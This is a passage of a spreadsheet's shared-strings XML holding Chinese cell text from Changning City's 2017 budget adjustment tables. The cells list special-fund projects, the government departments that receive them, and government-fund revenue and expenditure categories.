        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>万元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>21</t>
    </r>
  </si>
  <si>
    <t>贫困户危房改造本级配套</t>
  </si>
  <si>
    <t xml:space="preserve">  十二、工业发展及开放型经济发展专项资金</t>
  </si>
  <si>
    <t>“转型十年”资源枯竭转型升级工作实施情况报告编制经费、2017年资源枯竭城市转型绩效考核自评报告编制经费、转型十年电视宣传</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市资源枯竭型城市经济转型办公室 </t>
  </si>
  <si>
    <t>安培中心工资待遇补贴、收缴烟花爆竹储存仓库经费、安全隐患排查补偿</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市安全监督管理局 </t>
  </si>
  <si>
    <t>生产违法案件查处及举报奖励、烟花爆竹探测仪经费、打非治违专项经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市安全执法大队 </t>
  </si>
  <si>
    <t>电商扶贫经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市商务和粮食局 </t>
  </si>
  <si>
    <t>服务中心经费缺口</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市市场服务中心 </t>
  </si>
  <si>
    <t>工作经费、歌剧院建设工程项目回购款、仙岭垃圾场近邻村组送纯净水资金</t>
  </si>
  <si>
    <t>松柏污水处理厂指挥部、常宁市核电项目建设办、 常宁市仙岭垃圾无害化处理场工程建设领导小组</t>
  </si>
  <si>
    <t>科普示范县经费、科普奖补资金</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市科学技术协会 </t>
  </si>
  <si>
    <t xml:space="preserve">  十三、住房保障专项资金</t>
  </si>
  <si>
    <t>221</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">     </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">  十四、融资平台建设专项资金</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">     城区和水口山片区棚户区改造项目资金本金</t>
    </r>
  </si>
  <si>
    <t>常宁市棚改投资有限责任公司</t>
  </si>
  <si>
    <t xml:space="preserve">  十五、偿债还本付息资金</t>
  </si>
  <si>
    <t xml:space="preserve">  十六、人大政协重点建议、议案办理专项资金</t>
  </si>
  <si>
    <t xml:space="preserve">  十七、其他专项资金</t>
  </si>
  <si>
    <t>2017年常宁市政府性基金预算调整表</t>
  </si>
  <si>
    <t>收      入</t>
  </si>
  <si>
    <t>支      出</t>
  </si>
  <si>
    <t>项    目</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>201</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>7</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>年预算</t>
    </r>
  </si>
  <si>
    <t>一、政府性基金收入</t>
  </si>
  <si>
    <t>一、政府性基金支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>政府住房基金收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>大中型水库移民后期扶持基金支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国有土地使用权出让金收入</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">   小型水库移民扶助基金及对应专项债务收入安排的支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城市公用事业附加收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国有土地使用权出让收入及对应专项债务收入安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国有土地收益基金收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城市公用事业附加及对应专项债务收入安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农业土地开发资金收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国有土地收益基金及对应专项债务收入安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城市基础设施配套费收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农业土地开发资金及对应专项债务收入安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>污水处理费收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>新增建设用地土地有偿使用费及对应专项债务收入安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>水土保持补偿费收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>城市基础设施配套费及对应专项债务收入安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>散装水泥专项资金收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>新菜地开发建设基金及对应专项债务收入安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>新型墙体材料专项基金收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>大中型水库库区基金及对应专项债务收入安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他政府性基金收入</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>污水处理费及对应专项债务收入安排的支出</t>
    </r>
  </si>
  <si>
    <t>二、政府性基金上级补助收入</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>水土保持补偿费安排的支出</t>
    </r>
  </si>
  <si>
    <t>三、政府性基金上年结余</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>散装水泥专项资金及对应专项债务收入安排的支出</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">   新型墙体材料专项基金及对应专项债务收入安排的支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他政府性基金及对应专项债务收入安排的支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>彩票公益金支出</t>
    </r>
  </si>
  <si>
    <t>二、政府性基金上解支出</t>
  </si>
  <si>
    <t>三、调出资金</t>
  </si>
  <si>
    <t>四、政府性基金结余</t>
  </si>
  <si>
    <t>金额</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市水务投资集团有限公司 </t>
  </si>
  <si>
    <t>附表3</t>
  </si>
  <si>
    <t>专项资金项目内容摘要</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">备 </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>注</t>
    </r>
  </si>
  <si>
    <t>与前表增减额</t>
  </si>
  <si>
    <t>2015年项目经费基数</t>
  </si>
  <si>
    <t>2016年追加项目经费</t>
  </si>
  <si>
    <t>合     计</t>
  </si>
  <si>
    <t>2016年考核奖励经费、白蚁防治经费、创卫办工作经费、添置和更换保密设备、信访接待中心经费、2016年度创卫工作考核奖励资金、“贯彻全会精神、问策常宁发展”征文工作经费</t>
  </si>
  <si>
    <t>市人大一次会议经费、人大干部赴浙江大学培训经费、机关办公楼维修改造资金、机关添置办公设备费用、十七届人大二次会议经费结算、会议室电子表决系统及附属设备采购</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>《衡阳年鉴》（常宁篇）彩板宣传经费、企业改制服务中心工作经费和信访维稳经费、机关党组织活动经费、车辆维修经费、信访安保工作经费、新增办公室设备采购、政府办公大楼电费、食堂费用、政府接待车费用、挂职领导经费、党建工作、学习经费、临时聘用人员经费</t>
  </si>
  <si>
    <t>“政协云”建设及运行经费、政协委员培训经费、政协委员工作室建设、政协机关维修及保卫经费、十届政协二次会议经费结算</t>
  </si>
  <si>
    <t>中国人民政治协商会议常宁市委员会办公室</t>
  </si>
  <si>
    <t>机关自身建设经费</t>
  </si>
  <si>
    <t>会议室装修项目、台办涉台经济工作经费</t>
  </si>
  <si>
    <t>市委巡察办工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">中共常宁市纪律检查委员会 </t>
  </si>
  <si>
    <t>涉军办办公经费、涉军办维稳工作经费、综治工作表彰经费、综治信息系统工作经费</t>
  </si>
  <si>
    <t>“常宁道德模范”暨“身边雷锋、常宁好人”评选表彰活动经费、《常宁报》编撰经费、《常宁报》微信公众号运行经费、衡阳日报社《衡阳日报》《衡阳晚报》对常新闻宣传工作经费、党政客户端招聘人员经费待遇、文明创建表彰工作经费、开展学雷锋志愿服务活动经费、文化艺术创作扶持奖励资金及评选颁奖经费、2017年应急救援演练活动录制经费、对外地域文化交流系列活动经费、省市媒体宣传经费、中国改革报社《经济新常态、常宁新发展》专题报道经费、网评工作经费</t>
  </si>
  <si>
    <t>视频接访系统建设经费、信访维稳救助经费、信访专项办公经费</t>
  </si>
  <si>
    <t>2016年11月份-2017年11月接待费用</t>
  </si>
  <si>
    <t>“12345”政府服务热线工作经费、《湖南信息年鉴》宣传发行费、党政门户网站升级改版、矿产资源税费征收系统网络租赁费、政府信息招标工程及专线租赁费、治安卡口工程项目监理</t>
  </si>
  <si>
    <t>民宗事务、宗教场所换证所需经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市民族宗教事务局 </t>
  </si>
  <si>
    <t>全省政务体系普查工作经费、政务中心运行经费</t>
  </si>
  <si>
    <t>违规招投标问题集中整治工作经费、优化经济发展环境事务经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市优化经济环境办公室 </t>
  </si>
  <si>
    <t>招商引资及日常项目经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市宜阳工业园区管理委员会 </t>
  </si>
  <si>
    <t>党史、地方史采编、印刷经费、《常宁黄埔》档案资料查找经费、《常宁市工农革命运动资料》出版经费、《回忆录》编写经费、《常宁工农革命运动史资料》工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市史志办 </t>
  </si>
  <si>
    <t>联网直报中心数据处理平台建设经费、三农普查二阶段工作经费、统计工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市统计局 </t>
  </si>
  <si>
    <t>“三农普”遥感测量后续资金、各项专项调查事务</t>
  </si>
  <si>
    <t>财税综合信息平台建设、PPP项目工作启动、税源调查、预算执行动态监控系统平台建设、专业工程造价软件采购经费、资源枯竭城市资金、财政管理事务、乡财管理事务、绩效评价中介服务工作经费、乡镇财政建设</t>
  </si>
  <si>
    <t>乡财管理及涉农补贴发放等工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市乡镇财政局 </t>
  </si>
  <si>
    <t>财政票据电子化改革平台建设、财政票据工本费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市非税收入征收管理局 </t>
  </si>
  <si>
    <t>国库集中支付管理、各类凭证工本费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市国库集中支付局 </t>
  </si>
  <si>
    <t>机关网络建设、聘用人员工资、专项审计工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市审计局 </t>
  </si>
  <si>
    <t>“三超两乱”整改工作、事业单位改革分类、机构编制实名制管理、行政权力清单、天堂山公园机构设置、中文域名注册工作经费</t>
  </si>
  <si>
    <t>事业单位登记、统一社会信用代码办理等事务经费</t>
  </si>
  <si>
    <t>特困老干部补助金、《老年保健》会刊印刷经费、春节慰问经费、敬老资金、老干部书画协会活动、离退休干部待遇、老干部工作经费、参加衡阳市合唱比赛费用</t>
  </si>
  <si>
    <t>开展异地商会建设工作经费、工商联事务管理经费</t>
  </si>
  <si>
    <t>“巾帼心向党扬帆新征程”妇女节活动、“母亲节”“六一”儿童节工作、农村适龄妇女“两癌”免费检查工作、文明家庭评选表彰活动</t>
  </si>
  <si>
    <t>志愿者服务春运活动、团委事务、志愿服务工作经费、预防青少年犯罪、禁毒、教育工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">中国共产主义青年团常宁市委员会 </t>
  </si>
  <si>
    <t>工会事务经费（含工会经费、帮扶、非公经济组织、厂务公开、双联）、劳动模范、先进工作者评选表彰经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市总工会 </t>
  </si>
  <si>
    <t>2017年异地教学和调研经费、干部教育项目经费</t>
  </si>
  <si>
    <t xml:space="preserve">中共常宁市委党校 </t>
  </si>
  <si>
    <t>食品药品抽样检验经费、食品安全工作考核资金、能源计量检测和合格认可经费、食品药品抽样检验经费、食品安全工作经费、消委工作经费、洪灾损失经费</t>
  </si>
  <si>
    <t>原监局、工商</t>
  </si>
  <si>
    <t>改制办工作经费、公车处置费用、公务车辆购置经费、公务车辆运行经费、国有资产管理、国有资产归集＼处置经费、国资中心办公用房专修及设备采购、国有资产清查工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市国有资产管理局 </t>
  </si>
  <si>
    <t>运矿车辆统一编号信息采集工作经费</t>
  </si>
  <si>
    <t>常宁市矿产资源税费征收办公室</t>
  </si>
  <si>
    <t>？？？</t>
  </si>
  <si>
    <t>2017年征收经费及协税护税奖励</t>
  </si>
  <si>
    <t>各征收单位</t>
  </si>
  <si>
    <t>国库业务经费</t>
  </si>
  <si>
    <t xml:space="preserve">中国人民银行常宁市支行 </t>
  </si>
  <si>
    <t>2017年全市村（居委会）“两委”换届选举工作、大学生村官工作经费、大学生村官社会保险缴费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市农村基层组织建设领导小组办公室 </t>
  </si>
  <si>
    <t>举办入党积极分子和发展对象集中培训</t>
  </si>
  <si>
    <t xml:space="preserve">直属工委 </t>
  </si>
  <si>
    <t>远教点运行维护和设备更新换代经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市党员干部现代远程教育管理中心 </t>
  </si>
  <si>
    <t>回国留学人员摸底、侨资企业基本经营情况调研、归侨侨眷管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市归侨侨眷联合会 </t>
  </si>
  <si>
    <t>党建促脱贫攻坚工作、非公党组织党费配套、非公组织和社会组织党组织集中组建活动、举办入党积极分子培训经费</t>
  </si>
  <si>
    <t>代表建议委员提案办理、法制工作事务、依法行政工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市人民政府法制办公室 </t>
  </si>
  <si>
    <t>处置非法集资工作宣传广告费、春节期间防范和打击非法集资、金融扶贫、金融知识培训</t>
  </si>
  <si>
    <t>第四次档案移交进馆、档案管理</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市档案局 </t>
  </si>
  <si>
    <t>地震应急科普宣传教育经费、地震事务项目</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市地震局 </t>
  </si>
  <si>
    <t>2016年目标管理绩效考核资金</t>
  </si>
  <si>
    <t>街道绿化资金、办公楼维修和设施采购、购置办公用品、2016年困难乡镇补助、安全生产、中央环保督察现场准备工作经费</t>
  </si>
  <si>
    <t>消防车辆运行维护费、消防员健康补贴、高危补贴、应急救援经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市消防大队 </t>
  </si>
  <si>
    <t>武警中队基本支出</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市武警中队 </t>
  </si>
  <si>
    <t>“平安常宁”监控工程三期维护费用、公安技侦工作站建设、禁毒工作经费、社会治安管理大队和抽调人员、协辅警经费、“数字常宁、平安常宁”建设变更增加、大屏显示系统建设、拘留所、看守所人犯伙食费、派出所建设、新建九个治安卡口电表立户和临时用电费用、武警中队营方配套附属项目工程款</t>
  </si>
  <si>
    <t>塔山、弥泉乡交通执勤、单位抽调人员、交通协警经费、交通事故救助基金配套、东一环与南一环、东一环与南三环路口电子警察红绿灯工程、车排气污染监管限行整治、青阳路与北一环、青阳路与市府路路口电子警察红绿灯工程</t>
  </si>
  <si>
    <t>办案专项经费、查处兰江乡国土所贪污专案、省检察机关司法体制改革试点工作经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市人民检察院 </t>
  </si>
  <si>
    <t>法院陪审员经费、聘用人员经费、两庭建设、执行救助基金</t>
  </si>
  <si>
    <t>司法局协警经费、浯洲岛休闲度假有限公司非法集资信访案专项、社区娇正、普法、人民调解、以奖代补等项目经费、法律援助经费</t>
  </si>
  <si>
    <t>“两法”衔接经费</t>
  </si>
  <si>
    <t>预算口</t>
  </si>
  <si>
    <t>2013－2016年湘汇公司校车营运补贴、2017年校车补贴款、中职助学金本级配套、家庭经济困难幼儿入园补助资金本级配套、班主任经费、普通高中国家助学金本级配套、教育退休独生子女父母奖励经费、农村计生家庭孩子优惠补助款、教师体检经费、寄宿制学校运行条件改善配套</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市教育局 </t>
  </si>
  <si>
    <t>学校道路油化资金、基建维修资金</t>
  </si>
  <si>
    <t>新兵役前训练经费</t>
  </si>
  <si>
    <t>兰江幼儿园收购资金</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市幼儿园 </t>
  </si>
  <si>
    <t>义务教育经费保障经费、义务教育“一补”本级配套（公用经费、寄宿生活补助、校舍维修改造）、教育核算中心工作经费、泉峰小学建设</t>
  </si>
  <si>
    <t>“湖湘文化、文明衡阳．和谐常宁”书法展活动、版画产业文化园扶持、拍摄第四届中国（常宁）油茶旅游文化节音乐电视片、少数民族舞蹈“击鼓舞”进课堂培训及汇报表演、艺术家交流协会艺术大讲坛、参加“第六届京剧艺术节”活动、、修缮爱国主义教育基地经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市文化艺术界联合会 </t>
  </si>
  <si>
    <t>2017年农村电影放映补贴配套、“欢乐潇湘．幸福衡阳．魅力常宁”暨“喜迎十九大．建设新常宁”系列群众文化活动、文化广播出版工作事务、体育事务、“精准扶贫．送电影下乡”专项经费、书法家采风宣传报道活动</t>
  </si>
  <si>
    <t>文物保护、陈列馆、文物征集经费、文物抢救性发掘经费、版画收藏室设施建设、水口山二处国家重点文物保护抢险加固勘察方案</t>
  </si>
  <si>
    <t>2017年春节文化活动经费、群众文化活动</t>
  </si>
  <si>
    <t>公共图书馆评估定级经费</t>
  </si>
  <si>
    <t>剧场维修、群众文化活动经费、2017年“精准扶贫．送戏下乡”专场演出活动经费</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市剧团 </t>
  </si>
  <si>
    <t>《记录东方》专题片摄制、央视《新闻联播》上稿奖励、广播电视、村村响、村村通等项目、广播电视事务</t>
  </si>
  <si>
    <t>文化市场监管</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市文化执法局 </t>
  </si>
  <si>
    <t>中心开办经费、全民健身日系列活动经费</t>
  </si>
  <si>
    <t>建国初期参加革命工作的退休干部生活补贴、医疗补贴、离休干部医药费</t>
  </si>
  <si>
    <t>2017年全市村（居委会）“两委”换届选举工作、城乡低保本级配套资金、储金会兑付资金、福利公司困难补助、应急救灾资金、2017年五保供养、农村低保和社会保障兜底脱贫对象认定清理整顿、民政管理事务、2017年全市村（居委会）“两委”换届选举工作经费</t>
  </si>
  <si>
    <t>为民办实事康复经费及残疾人基本服务状况和需求信息数据动态更新工作、残疾人教就工作配套、残疾人综合服务大楼建设、代缴一级残疾人城乡居民医疗保险、残疾人精准康复服务资金、贫困残疾人家庭无障碍改造资金</t>
  </si>
  <si>
    <t xml:space="preserve">常宁市残疾人联合会 </t>
